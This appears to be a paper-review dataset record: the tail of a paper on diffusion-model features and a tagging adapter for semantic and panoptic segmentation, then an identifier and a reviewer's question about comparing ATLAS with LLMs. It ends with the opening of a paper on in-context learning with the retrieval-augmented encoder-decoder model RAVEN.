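        self.gamma = nn.Parameter(torch.tensor(gamma_init))

    def forward(self, text_feats: torch.Tensor) -> torch.Tensor:
        # text_feats: (num_classes, dim) frozen TextEnc outputs
        return text_feats + self.gamma * self.mlp(text_feats)

class ImplicitCaptionAdapter(nn.Module):
    """Eq. 5: T(c) = MLP(ImageEnc(I)), an "implicit caption" projected from
    frozen image features into the diffusion condition space."""
    def __init__(self, img_dim: int, cond_dim: int):
        super().__init__()
        self.mlp = nn.Sequential(nn.Linear(img_dim, cond_dim), nn.GELU(),
                                 nn.Linear(cond_dim, cond_dim))

    def forward(self, img_feats: torch.Tensor) -> torch.Tensor:
        # img_feats: (num_tokens, img_dim) frozen ImageEnc outputs
        return self.mlp(img_feats)
```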
As highlighted in Figure 1, having accurate semantic information can markedly boost the performance of the diffusion model across diverse datasets. However, obtaining ground-truth class labels during inference remains a challenge. To address this, we introduce a tagging adapter to extract tag information. A straightforward approach involves using off-the-shelf image tagging models. Image tagging becomes particularly useful when ground-truth labels are inaccessible. This process predicts multiple labels for an image, often providing more detailed class information than captioning models. Interestingly, our findings indicate that alignment between the label space of the image tagging model and that of the downstream datasets is not mandatory. This adaptability allows for the integration of pre-trained tagging models with diverse label spaces, paving the way for zero-shot predictions on specific datasets. However, such zero-shot predictions often produce noisy tags. Directly employing these noisy labels without further refinement can result in a performance drop compared to an approach without textual conditions. To mitigate this, we propose a tagging adapter enhanced with cross-modal attention, as visualized in Figure 2. This adapter employs learnable queries that attend to both image and text features before being passed to the diffusion U-Net. This can be mathematically represented by: \[ c = \{c_i \in \text{Tag}(I)\} \] \[ T(c) = \text{MLP}(Q, \text{TextEnc}(c), \text{ImageEnc}(I)) \] (6) where \( Q \) denotes the query embeddings and \( \text{Tag}(I) \) signifies the predicted tags associated with the given image \( I \). Additionally, when ground-truth category labels are accessible during training, we can integrate a multi-label classification learning objective. We start by extracting query embeddings using Equation 6. After applying average pooling to the resulting query embeddings, the consolidated features are passed to a multi-label classifier. The weights of the classifier are initialized from the class embeddings and remain frozen. The predicted labels are computed as: \[ y_k = \frac{e^{\langle \text{Pool}(T(c)),\, h_k \rangle}}{\sum_{k'=1}^{K} e^{\langle \text{Pool}(T(c)),\, h_{k'} \rangle}} \] (7) where \( y_k \) stands for the \( k \)-th label from the entire candidate set and \( h_k \) represents the classifier’s \( k \)-th label weight. We adopt the asymmetric loss (Ridnik et al., 2021b) to train the tagging adapter, in line with established multi-label classification practice. This objective encourages the predicted query embeddings to highlight the relevant specifics of the correct image classes. 4 EXPERIMENTS This section provides a comprehensive description of our experiments, detailing the implementation, a comparative analysis with state-of-the-art methodologies for both semantic and panoptic segmentation, and an ablation study highlighting the significance of the proposed approach. 4.1 IMPLEMENTATION DETAILS Architecture: Our core architecture utilizes Stable Diffusion v1.5 as the backbone. Throughout the experimental evaluations, the encoder from VQGAN (Esser et al., 2021) remains frozen while the U-Net (Ronneberger et al., 2015) is fine-tuned. We extract multi-scale features from the U-Net’s up-sampling stages, consistent with the configurations outlined in Zhao et al. (2023).
These features have channel dimensions of [1280, 1280, 640, 320] and spatial resolutions of \([8 \times 8, 16 \times 16, 32 \times 32, 64 \times 64]\). For the image and text encoders in our adapter, we employ a frozen CLIP-L/14 (Radford et al., 2021). To maintain architectural simplicity, we utilize either SemanticFPN (Kirillov et al., 2019) or UperNet (Xiao et al., 2018) as the default decoder for semantic segmentation tasks, as explicitly specified in our results. For panoptic segmentation tasks, Mask2Former (Cheng et al., 2022) serves as our decoder, with \( N = 100 \) mask predictions. By default, we use RAM (Zhang et al., 2023) as our off-the-shelf zero-shot image tagging model. Hyperparameters: For the ADE20k (Zhou et al., 2019) dataset, we conduct experiments under two distinct settings: SemanticFPN for 80K iterations and UperNet for 160K iterations. The learning rate is set to \( 6 \times 10^{-5} \) for both settings. By default, the tagging adapter uses 32 queries and 2 attention blocks (a block here refers to one attention block of the adapter, as depicted in Figure 2). For panoptic segmentation tasks, the default learning rate is \( 1 \times 10^{-4} \); the batch size is 64, and the model is trained for 9k iterations. The multi-label classification loss weight in both experimental settings is set to one. 5 COMPARISON WITH THE STATE OF THE ART ADE20k Benchmark. The ADE20k benchmark is celebrated for its comprehensive scene understanding, capturing a rich array of semantic details from 150 unique object and stuff categories.

| Method | Pre-train Data | Crop Size | mIoU | +MS |
|------------------------|---------------|-------------|------|------|
| **Supervised pre-training** | | | | |
| PVTv2-B2 (Wang et al., 2022) | IN-1K | 512 × 512 | 45.2 | 45.7 |
| Swin-B (Liu et al., 2021) | IN-1K | 512 × 512 | 46.0 | - |
| Twins-SV-T1 (Chu et al., 2021) | IN-1K | 512 × 512 | 46.7 | - |
| ViT-B (Dosovitskiy et al., 2020) | IN-1K | 512 × 512 | 46.4 | 47.6 |
| ConvNeXt-B (Liu et al., 2022) | IN-22K | 512 × 512 | - | 49.9 |
| InternImage-B (Wang et al., 2023) | IN-1K | 512 × 512 | - | 50.8 |
| Swin-L (Liu et al., 2021) | IN-22K | 640 × 640 | - | 52.1 |
| RepLKNet-3Tf (Ding et al., 2022) | IN-22K | 640 × 640 | - | 52.4 |
| ConvNeXt-XL (Liu et al., 2022) | IN-22K | 640 × 640 | - | 54.0 |
| InternImage-XL (Wang et al., 2023) | IN-22K | 640 × 640 | - | 55.0 |
| **Masked Image Modeling pre-training** | | | | |
| MAE-ViT-L/16 (He et al., 2022b) | - | - | 53.6 | - |
| BEiT-B (Bao et al.) | MM | 640 × 640 | - | 53.1 |
| BEiT-L (Bao et al.) | MM | 640 × 640 | - | 56.7 |
| **Multi-Modal pre-training** | | | | |
| CLIP-ViT-B (Radford et al., 2021) | MM | 640 × 640 | 50.6 | 51.3 |
| ViT-Adapter-Swin-L (Chen et al., 2022) | MM | 512 × 512 | 54.2 | 54.7 |
| **Diffusion pre-training** | | | | |
| VPD (Zhao et al., 2023) | LAION-2B | 512 × 512 | 53.7 | 54.6 |
| Ours | LAION-2B | 512 × 512 | 55.8 | 56.9 |
| Ours | LAION-2B | 640 × 640 | 56.2 | 57.2 |

Table 1: ADE20K val benchmark. 'IN-1K/22K' means ImageNet-1K/22K; 'MM' means multi-modal pre-training; 'LAION-2B' is a large-scale multi-modal dataset; '+MS' means multi-scale testing. SemanticFPN and UperNet are the two segmentation decoders: SemanticFPN is trained for 80K iterations and UperNet for 160K iterations.

The dataset consists of 20k training images complemented by a 2k-image validation set. We adopt the mean intersection over union (mIoU) as our performance metric.
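For completeness, mIoU averages the per-class intersection-over-union; a minimal NumPy sketch (omitting the ignore-index handling and dataset-level accumulation used by standard evaluation toolkits):

```python
import numpy as np

def mean_iou(pred: np.ndarray, gt: np.ndarray, num_classes: int) -> float:
    """mIoU: average over classes of |pred ∩ gt| / |pred ∪ gt|,
    skipping classes absent from both prediction and ground truth."""
    ious = []
    for c in range(num_classes):
        inter = np.logical_and(pred == c, gt == c).sum()
        union = np.logical_or(pred == c, gt == c).sum()
        if union > 0:
            ious.append(inter / union)
    return float(np.mean(ious))
```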
A detailed comparison with leading models is presented in Table 1, highlighting various models distinguished by their backbones and training datasets. By default, we use both the zero-shot predicted labels and the multi-label classification loss. **Supervised pre-training.** A dominant strategy for dense prediction tasks is supervised pre-training, with models such as InternImage-XL (Wang et al., 2023) tailored specifically for computer vision. Our method, when paired with UperNet, achieves an increase of approximately +1.8 mIoU for single-scale testing and +2.0 mIoU for multi-scale testing. While supervised pre-training approaches are robust, they are frequently constrained by the availability of pre-training data, given the high costs associated with acquiring supervised annotations. Our results indicate that, with the right tagging adapter, large-scale pre-trained text-to-image diffusion models can rival their supervised counterparts. **Masked Image pre-training and Multi-Modal pre-training.** Our model was benchmarked against MAE-ViT-L/16 (He et al., 2022b) and CLIP-ViT (Radford et al., 2021). Our method consistently outperforms these baselines. Notably, we also drew comparisons with BEiT-L (Bao et al.), a leading competitor that first pre-trains on self-supervised multi-modal data and then fine-tunes on ImageNet-22K (Ridnik et al., 2021a). Within the UperNet setting, our approach surpassed BEiT-L as well. **Diffusion Pre-Training.** VPD is built upon Stable Diffusion v1.5. Notably, it feeds the entire set of candidate class names to its adapter. Using a similar SemanticFPN decoder configuration, our model achieved an increase of +2.1 mIoU under the single-scale testing setting and +2.3 mIoU under the multi-scale testing setting. These results highlight the importance of conditioning information for extracting knowledge from the diffusion model.

| Method | Backbone | mIoU | +MS |
|-----------------|----------------|------|-----|
| OCRNet | HRNet-W48 | 40.4 | 41.7 |
| OCRNet | HRFormer-B | - | 43.3 |
| SegFormer | MiT-B5 | - | 46.7 |
| SegNeXt | MSCAN-L | 46.5 | 47.2 |
| RankSeg | ViT-L | 46.7 | 47.9 |
| UperNet-RRT | Swin-B | 48.2 | 49.2 |
| Segmenter | ViT-L | 49.1 | 50.1 |
| UperNet | BEiT-L | 49.7 | 49.9 |
| VPD* | SD | 48.3 | - |
| Ours | SD | 50.6 | 51.6 |

Table 2: COCO-Stuff164k val benchmark. Our method is trained with a crop size of $640 \times 640$ for 80k iterations. * denotes our implementation.

| Method | Backbone | Decoder | Crop Size | mIoU |
|-----------------|----------------|---------------|-------------|------|
| Segformer | MiT-B5 | Mask2Former | 1024 × 1024 | 82.4 |
| Panoptic-DeepLab | SWideRNet | Mask2Former | 1024 × 2048 | 82.2 |
| Mask2Former-T | Swin-T | Mask2Former | 512 × 1024 | 81.7 |
| Mask2Former-L | Swin-L | Mask2Former | 512 × 1024 | 83.6 |
| OneFormer | DiNAT-L | Mask2Former | 512 × 1024 | 83.1 |
| VPD* | SD | SemanticFPN | 512 × 1024 | 81.8 |
| Ours | SD | SemanticFPN | 512 × 1024 | 82.6 |

Table 3: Cityscapes val benchmark. Our method is trained for 90k iterations with a lightweight SemanticFPN decoder.

**COCO-Stuff164k Benchmark.** The COCO-Stuff164k benchmark is a challenging dataset comprising 171 unique classes, divided into 80 “thing” categories and 91 “stuff” categories. As shown in Table 2, our approach consistently outperforms many top-tier models, such as SegFormer (Xie et al., 2021), RankSeg (He et al., 2022a), and Segmenter (Strudel et al., 2021).
Notably, RankSeg utilizes a jointly optimized multi-label classifier. The efficacy of RankSeg is closely tethered to the recall of its predictions, as omitted labels reduce the decision space and can compromise performance. Unlike RankSeg, our model leverages predicted labels within cross-attention mechanisms, which helps mitigate the effects of inaccurately predicted labels. These experimental results confirm the effectiveness and robustness of our model in segmentation tasks. **Cityscapes Benchmark.** Cityscapes focuses on intricate urban scenes and encompasses 19 unique categories. Table 3 presents a comparative analysis of our approach against other leading models in this field. Our model outperforms VPD, which is also based on the Stable Diffusion model; the results again suggest the effectiveness of the proposed model. Our model slightly lags behind Mask2Former-L, given that the latter employs a more advanced decoder than the SemanticFPN we use. Meanwhile, the Cityscapes dataset's class variety is narrow and does not fully exercise our tagging adapter's potential (as also observed in our oracle experiment in Figure 1). **COCO-Panoptic Benchmark.** The COCO-Panoptic dataset is a challenging collection containing 133 classes. We compare with baselines using metrics such as panoptic quality (PQ), average precision (AP), and mIoU in Table 4. By default, we employ the Mask2Former decoder for this benchmark. Our proposed model exhibits competitive performance across the board, surpassing several established methods in this task. This indicates the robustness and effectiveness of the techniques and strategies incorporated into our model. When using the SD backbone, our method outperforms ODISE, especially in terms of PQ and mIoU. In the 100-query setting, our method outperforms competitive models like Mask2Former and Panoptic SegFormer. 6 ABLATION STUDY To verify the effectiveness of our model design, in this section we examine the influence of the multi-label classification learning objective, the zero-shot image tagging model (RAM), the number of adapter blocks, and the weight of the classification loss. All ablation studies are conducted on the ADE20k dataset with a fixed input resolution of $512 \times 512$. 6.1 COMPARISON OF DIFFERENT ADAPTERS Table 5 shows the performance of different adapters. We start with the "unconditioned" input, which feeds an empty semantic condition to the diffusion U-Net; its score of 53.9 can be seen as the baseline performance. When conditioned solely on the whole set of candidate class labels, models like VPD offer competitive performance, and ODISE further enhances performance via an implicit captioner built on CLIP$_{img}$. Furthermore, it is intriguing to note that Tag2Text-caption performs worse than the baseline model. This discrepancy might be attributed to the presence of noisy or incorrect semantic conditions produced by Tag2Text's zero-shot captioning. Such noise can hinder the model's ability to accurately segment images, underscoring the importance of reliable tagging in the zero-shot scenario. Our proposed approach, which combines both CLIP$_{img}$ and CLIP$_{text}$, consistently outperforms the other strategies. This highlights the complementarity of image- and text-based cues in semantic segmentation tasks.
The integration of the multi-label learning objective in our model leads to a tangible boost in performance (from 54.8 to 55.5), signifying the efficacy of such a loss in capturing the intricate nuances of the ADE20K dataset. The addition of RAM (the zero-shot image tagging model) further augments our model's capabilities, culminating in an mIoU of 55.8, the highest among the models under consideration. 6.2 THE INFLUENCE OF LOSS WEIGHTS AND NUMBER OF BLOCKS Table 6 and Table 7 present a comprehensive analysis of our model's performance under varied configurations, focusing on the weight of the loss function and the number of adapter blocks. As evidenced by Table 6, varying the weight of the loss function has a distinct impact on the model's mIoU score. Interestingly, a weight of 5 yields the optimal mIoU of 55.72, which is marginally superior to the other weight configurations. This suggests that a delicate balance is required when determining the loss weight, as both under-weighting and over-weighting can detrimentally affect the model's segmentation capability. Turning our attention to Table 7, it is evident that the number of blocks plays a pivotal role in the model's performance. With 2 blocks, our model achieves an mIoU of 55.51, the highest among the considered configurations. However, as we increase the number of blocks, a slight decline in performance is observed. This may imply that beyond a certain point, adding more blocks introduces complexity without a corresponding increase in representational power, potentially leading to overfitting or diminished generalization.

| Method | Backbone | PQ | AP | mIoU |
|-------------------------|----------|------|------|------|
| DETR (Carion et al., 2020) | R50 | 43.4 | - | - |
| K-Net (Zhang et al., 2021b) | R50 | 47.1 | - | - |
| Panoptic SegFormer (Li et al., 2022c) | PVTv2-B5 | 54.1 | - | - |
| MaskFormer (Cheng et al., 2021) | Swin-B | 51.1 | 37.8 | 62.6 |
| Mask2Former (Cheng et al., 2022) | Swin-T | 53.2 | 43.3 | 63.2 |
| Mask2Former | Swin-B | 55.1 | 45.2 | 65.1 |
| Mask2Former (200 queries) | Swin-L | 57.8 | 48.6 | 67.4 |
| FocalNet-L (200 queries) (Yang et al., 2022) | Swin-L | 57.9 | 48.4 | 67.3 |
| ODISE (Xu et al., 2023) | SD | 55.4 | 46.0 | 65.2 |
| Ours | SD | 56.1 | 46.5 | 66.5 |

Table 4: COCO-Panoptic val benchmark. Our method is trained with batch size 64 for 9k iterations, the same as ODISE.

| Method | Extra Captioner | Multi-Label Loss | mIoU |
|-----------------|-----------------|------------------|------|
| Uncondition | CLIP$_{text}$ | - | 53.9 |
| Tag2Text-Caption | Tag2Text (Huang et al., 2023) | - | 53.5 |
| VPD* | CLIP$_{text}$ | - | 54.2 |
| BLIP | BLIP (Li et al., 2022b) | - | 54.2 |
| ODISE* | CLIP$_{img}$ | - | 54.5 |
| Ours | CLIP$_{img}$ + CLIP$_{text}$ | - | 54.8 |
| Ours | CLIP$_{img}$ + CLIP$_{text}$ | yes | 55.5 |
| Ours | CLIP$_{img}$ + CLIP$_{text}$ + RAM | yes | **55.8** |

Table 5: The influence of different adapters on ADE20K; the setting is 80K iterations. * denotes our implementation.

| Adapter | Loss weight | mIoU |
|-----------------|-------------|------|
| TextEnc + ImageEnc | 0 | 54.84 |
| | 1 | 55.51 |
| | 5 | **55.72** |
| | 10 | 55.04 |
| | 15 | 54.96 |

Table 6: The influence of the multi-label classification loss weight on ADE20K; the setting is 80K iterations. TextEnc denotes CLIP$_{text}$ and ImageEnc denotes CLIP$_{img}$.
| Adapter | Blocks | mIoU |
|-----------------|--------|------|
| TextEnc + ImageEnc | 2 | **55.51** |
| | 4 | 55.20 |
| | 6 | 55.43 |
| | 8 | 54.94 |
| | 10 | 54.73 |

Table 7: The influence of the number of adapter blocks on ADE20K; the adapter block is shown in Figure 2; the setting is 80K iterations. TextEnc denotes CLIP$_{text}$ and ImageEnc denotes CLIP$_{img}$.

While our model exhibits commendable performance across varied configurations, it is essential to juxtapose these results against those of other state-of-the-art models. The consistent outperformance of our approach reiterates its robustness and versatility, especially when benchmarked against models that employ different conditioning strategies or loss weights. 7 LIMITATIONS Though text-to-image diffusion models demonstrate impressive capabilities in synthesizing high-quality images from textual descriptions, and hold potential for dense prediction tasks, they have inherent limitations. One primary constraint is their reliance on precise class tagging information: the accuracy of the downstream tasks is deeply tied to the clarity and correctness of the textual descriptions or image class tags. Ambiguities, inaccuracies, or contextual gaps in these descriptions can substantially undermine the model's performance. Furthermore, the model's adaptability across a spectrum of intricate real-world scenarios is yet to be validated, leaving open questions about its robustness. 8 CONCLUSION This paper delves into the potential of text-to-image diffusion models for dense prediction tasks. By leveraging large-scale pre-training data, these models have showcased their ability to produce high-quality images based on varied textual descriptions. Our research indicates that, given the right semantic conditions, the implicit knowledge within these models can be successfully applied to downstream visual perception tasks. Experimental results reveal the significant role of ground-truth semantic conditions. Inspired by this observation, we propose a tagging adapter designed to offer robust and accurate semantic conditions, further enhanced by a multi-label classification loss. Comprehensive evaluations across various benchmarks highlight the efficacy of the tagging adapter, demonstrating that the diffusion model can achieve superior results in visual dense prediction tasks. REFERENCES Hangbo Bao, Li Dong, and Furu Wei. BEiT: BERT pre-training of image transformers. arXiv preprint arXiv:2106.08254, 2021. Dmitry Baranchuk, Ivan Rubachev, Andrey Voynov, Valentin Khrulkov, and Artem Babenko. Label-efficient semantic segmentation with diffusion models. arXiv preprint arXiv:2112.03126, 2021. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. Advances in neural information processing systems, 33:1877–1901, 2020. Holger Caesar, Jasper Uijlings, and Vittorio Ferrari. Coco-stuff: Thing and stuff classes in context. In Computer vision and pattern recognition (CVPR), 2018 IEEE conference on. IEEE, 2018. Nicolas Carion, Francisco Massa, Gabriel Synnaeve, Nicolas Usunier, Alexander Kirillov, and Sergey Zagoruyko. End-to-end object detection with transformers. In European conference on computer vision, pp. 213–229. Springer, 2020.
Zhe Chen, Yuchen Duan, Wenhai Wang, Junjun He, Tong Lu, Jifeng Dai, and Yu Qiao. Vision transformer adapter for dense predictions. arXiv preprint arXiv:2205.08534, 2022. Bowen Cheng, Alex Schwing, and Alexander Kirillov. Per-pixel classification is not all you need for semantic segmentation. Advances in Neural Information Processing Systems, 34:17864–17875, 2021. Bowen Cheng, Ishan Misra, Alexander G Schwing, Alexander Kirillov, and Rohit Girdhar. Masked-attention mask transformer for universal image segmentation. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 1290–1299, 2022. Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. Palm: Scaling language modeling with pathways. arXiv preprint arXiv:2204.02311, 2022. Xiangxiang Chu, Zhi Tian, Yuqing Wang, Bo Zhang, Haibing Ren, Xiaolin Wei, Huaxia Xia, and Chunhua Shen. Twins: Revisiting the design of spatial attention in vision transformers. Advances in Neural Information Processing Systems, 34:9355–9366, 2021. Marius Cordts, Mohamed Omran, Sebastian Ramos, Timo Rehfeld, Markus Enzweiler, Rodrigo Benenson, Uwe Franke, Stefan Roth, and Bernt Schiele. The cityscapes dataset for semantic urban scene understanding. In Proceedings of the IEEE conference on computer vision and pattern recognition, pp. 3213–3223, 2016. Jiequan Cui, Yuhui Yuan, Zhisheng Zhong, Zhuotao Tian, Han Hu, Stephen Lin, and Jiaya Jia. Region rebalance for long-tailed semantic segmentation. arXiv preprint arXiv:2204.01969, 2022. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In 2009 IEEE conference on computer vision and pattern recognition, pp. 248–255. Ieee, 2009. Xiaohan Ding, Xiangyu Zhang, Jungong Han, and Guiguang Ding. Scaling up your kernels to 31x31: Revisiting large kernel design in cnns. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 11963–11975, 2022. Jeff Donahue and Karen Simonyan. Large scale adversarial representation learning. Advances in neural information processing systems, 32, 2019. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. arXiv preprint arXiv:2010.11929, 2020. Patrick Esser, Robin Rombach, and Bjorn Ommer. Taming transformers for high-resolution image synthesis. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 12873–12883, 2021.
QXRScRrwNr
I wonder how to fairly compare ATLAS and LLMs, since they may not use the same datasets. (1) Say ATLAS uses data A for pretraining and data B as a retrieval corpus, and an LLM uses data C for pretraining: does A + B = C? If not, how can they be compared fairly?
In-Context Learning with Retrieval Augmented Encoder-Decoder Language Models Anonymous authors Paper under double-blind review Abstract In this paper, we investigate the in-context learning ability of retrieval-augmented encoder-decoder language models. We first conduct a comprehensive analysis of the state-of-the-art ATLAS model and identify its limitations in in-context learning, primarily due to a mismatch between pretraining and testing, as well as a restricted context length. To address these issues, we propose RAVEN, a model that combines retrieval-augmented masked language modeling and prefix language modeling. We further introduce Fusion-in-Context Learning to enhance the few-shot performance by enabling the model to leverage more in-context examples without requiring additional training or model modifications. Through extensive experiments, we demonstrate that RAVEN significantly outperforms ATLAS and achieves results comparable to the most advanced language models in certain scenarios, despite having substantially fewer parameters. Our work underscores the potential of retrieval-augmented encoder-decoder language models for in-context learning and encourages further research in this direction. 1 Introduction Recent advancements in natural language processing have been predominantly driven by the development of large language models (LLMs) (Brown et al., 2020; OpenAI, 2022, 2023; Chowdhery et al., 2022; Smith et al., 2022). These models have demonstrated remarkable performance across a wide range of tasks (Qin et al., 2023; Bubeck et al., 2023; Huang & Chang, 2023). One of the key features that enables these models to excel is their ability to perform in-context learning (Dong et al., 2022). By conditioning on the given context, LLMs can adapt to new tasks and domains without the need for task-specific fine-tuning. This enables LLMs to perform well on zero-shot or few-shot learning tasks, where only a limited number of examples are available. While in-context learning has been extensively studied for decoder-only language models like GPT-3 (Brown et al., 2020) and PaLM (Chowdhery et al., 2022), research on encoder-decoder language models, which have been shown to learn stronger representations (Devlin et al., 2019; Raffel et al., 2020), remains limited. Notably, Patel et al. (2023) tap into the potential of mT5 (Xue et al., 2021), a multilingual encoder-decoder LM, by iteratively prompting the model to produce long generations with in-context examples. Chung et al. (2022); Longpre et al. (2023) finetune T5 (Raffel et al., 2020) with a large mixture of tasks using instruction tuning (Mishra et al., 2022; Wei et al., 2022; Sanh et al., 2022) to improve model performance and generalization to unseen tasks in both zero-shot and few-shot settings. On the other hand, LLMs still face challenges such as hallucination and limitations in representing the long-tail and most recent knowledge (Mallen et al., 2022; Huang et al., 2022; Luu et al., 2022; Jang et al., 2022; Zheng et al., 2023). Retrieval-augmented language models (Izacard et al., 2022b; Borgeaud et al., 2022; Wang et al., 2023; Shi et al., 2023) have emerged as a powerful approach to address these issues by retrieving relevant knowledge from an external corpus. Among these, the encoder-decoder models, such as ATLAS (Izacard et al., 2022b), stand out.
They benefit from the strong representation ability of a bidirectional encoder, coupled with the efficacy of a Fusion-in-Decoder architecture (Izacard & Grave, 2021), enabling the effective integration of multiple retrieved passages. Despite these advancements, in-context learning with these models remains underexplored. 1 Code and model checkpoints will be made publicly available after the review process. In this regard, we first conduct a comprehensive analysis of the state-of-the-art retrieval-augmented encoder-decoder language model, ATLAS, by experimenting with various prompting strategies. We find that ATLAS exhibits a certain in-context learning ability; however, due to a mismatch between pretraining and testing and a limited context length (issues common to existing encoder-decoder LMs trained with masked language modeling), its few-shot performance is not stable, and providing more examples (e.g., beyond 8-shot) does not lead to further improvement. Based on the analysis, we develop RAVEN\footnote{RAVEN, a bird known for its intelligence and adaptability, has the letters “RA” in its name, which represents “Retrieval-Augmented” in our context.} by first mitigating the mismatch between pretraining and testing of ATLAS through a combination of retrieval-augmented masked language modeling and prefix language modeling. Moreover, to enable the model to learn from more in-context examples, we propose Fusion-in-Context Learning, a novel approach that allows the model to utilize more in-context examples without modifying the model configuration or requiring additional training. Furthermore, we suggest using the retriever of the model to obtain relevant in-context examples to further enhance few-shot performance. Our empirical results demonstrate that RAVEN significantly outperforms ATLAS in both zero-shot and few-shot settings, even achieving comparable results to decoder-only large language models in some settings despite having 180 times fewer parameters. The main contributions of this paper are summarized as follows: • We present a comprehensive analysis of the in-context learning ability of the SOTA retrieval-augmented encoder-decoder language models and identify aspects for improvement. • Based on the analytical groundwork, we develop RAVEN by combining retrieval-augmented masked and prefix language modeling. • We further design Fusion-in-Context Learning and In-Context Example Retrieval to enhance the few-shot performance of retrieval-augmented encoder-decoder language models. • We demonstrate the effectiveness of RAVEN and the proposed methods through extensive experiments, showcasing its superiority in various settings compared to strong baselines. 2 BACKGROUND AND RELATED WORK In-Context Learning. In-context learning is one of the most significant features of LLMs (e.g., Dong et al., 2022). While there is growing interest in this area, most studies have focused on in-context learning with decoder-only LMs, e.g., GPT-3 (Brown et al., 2020). However, bidirectional LMs like BERT (Devlin et al., 2019) and T5 (Raffel et al., 2020) have been shown to achieve superior performance on various natural language understanding tasks, indicating that they may offer unique advantages for in-context learning as well. Patel et al. (2023); Chung et al. (2022) have initiated exploration into in-context learning with bidirectional LMs. While these studies have shown promising results, there is considerable scope for further investigation. For instance, Patel et al.
(2023) demonstrate that bidirectional models can outperform decoder-only LMs of a similar scale in terms of in-context learning; however, there is still a significant performance gap compared to decoder-only models at a much larger scale. Retrieval-Augmented Language Models. Retrieval-augmented language models are a class of language models designed to enhance their performance by incorporating external knowledge. These models typically employ an information retrieval mechanism to access relevant information from a large corpus, which is then integrated into the model’s prediction process. Retrieval-augmented LMs can be based on both encoder-decoder (Izacard et al., 2022b; Lewis et al., 2020) and decoder-only (Khandelwal et al., 2020; Borgeaud et al., 2022; Shi et al., 2022) architectures. While there has been some research on in-context learning with retrieval-augmented decoder-only LMs, which can be straightforwardly implemented by concatenating retrieved passages with the query as the input of the LM (Mallen et al., 2022; Shi et al., 2023; Khattab et al., 2022), in-context learning with retrieval-augmented encoder-decoder LMs, such as ATLAS, remains unexplored to the best of our knowledge, despite the fact that encoder-decoder LMs can incorporate multiple (e.g., 40) retrieved passages more efficiently (Izacard & Grave, 2021). In the following sections, we will start with an analysis of ATLAS and develop our model based on the analysis. 3 IN-CONTEXT LEARNING WITH ATLAS ATLAS is the state-of-the-art retrieval-augmented encoder-decoder language model, which combines a general-purpose dense retriever and a sequence-to-sequence reader with the Fusion-in-Decoder architecture. The retriever, encoder, and decoder are jointly trained during the pretraining process. In this process, the dense retriever, based on the Contriever model (Izacard et al., 2022a), is responsible for selecting relevant passages from an external knowledge source, e.g., Wikipedia, based on the given corrupted context. The retrieved passages are then processed along with the context by the encoder, and the decoder generates the corresponding output, i.e., the masked spans (Figure 1, left). ATLAS demonstrates exceptional few-shot performance on knowledge-intensive language tasks (Petroni et al., 2021), despite having a lower parameter count than other recent LLMs. However, in Izacard et al. (2022b), the few-shot performance of ATLAS is achieved by finetuning the model with few-shot examples, which requires additional training and may limit its applications, such as dealing with dynamic and diverse real-time user queries like GPT-3/4 (Brown et al., 2020; OpenAI, 2023), where in-context learning plays a vital role. Nonetheless, the in-context learning ability of ATLAS has not been investigated in the original paper. Therefore, in this section, we aim to explore the in-context learning ability of ATLAS, using open-domain question answering (Chen et al., 2017) as a representative task. 3.1 PROMPTING STRATEGIES To facilitate in-context learning, an effective prompting strategy is paramount. In contrast to decoder-only language models, where the input can only be fed to the decoder, encoder-decoder language models can take input in either the encoder or the decoder.
In alignment with the pretraining objective of ATLAS, we identify two prompting strategies for in-context learning: **Strategy 1.** The first strategy involves feeding all example question-answer pairs and the target question to the encoder, without any input to the decoder. The prompt is designed as (see the code sketch below): \[ \text{Enc}: \text{Question: } q_1 \text{ Answer: } a_1 \ldots \text{ Question: } q_k \text{ Answer: } a_k \text{ Question: } q_0 \text{ Answer: } <\text{extra\_id}_0> d \] where \((q_1, a_1), \ldots, (q_k, a_k)\) represent example QA pairs, \(q_0\) denotes the target question, \(<\text{extra\_id}_0>\) is a sentinel token (Raffel et al., 2020), and \(d\) is a relevant passage retrieved with \(q_0\). An example in a 2-shot setting is illustrated in Figure 1 (middle). **Strategy 2.** As the decoder of ATLAS can also accept input, we can feed the answers of the in-context examples to the decoder and only feed the questions to the encoder, using multiple sentinel tokens: \[ \text{Enc}: \text{Question: } q_1 \text{ Answer: } <\text{extra\_id}_0> \ldots \text{ Question: } q_k \text{ Answer: } <\text{extra\_id}_{(k - 1)}> \text{ Question: } q_0 \text{ Answer: } <\text{extra\_id}_k> d \] \[ \text{Dec}: a_1 \ldots <\text{extra\_id}_{(k-1)}>\ a_k \] An example with this strategy is shown in Figure 1 (right). The model is expected to learn from the in-context examples by examining both the input to the encoder and the input to the decoder. Here we present a format designed for better demonstration; the actual prompt, which follows the template used in the pretraining of ATLAS, can be found in Appendix B.3.

Table 1: Results of ATLAS 11B with prompting strategy 1 (S1) and strategy 2 (S2).

| | Natural Questions | | | | TriviaQA | | | |
|----------|--------|--------|--------|--------|--------|--------|--------|--------|
| | 0-shot | 1-shot | 5-shot | 8-shot | 0-shot | 1-shot | 5-shot | 8-shot |
| ATLAS 11B S1 | 26.7 | 21.3 | 29.8 | **31.3** | 56.9 | 35.5 | 62.3 | **63.9** |
| ATLAS 11B S2 | 21.4 | 16.3 | 9.8 | - | 49.8 | 48.4 | 44.4 | - |

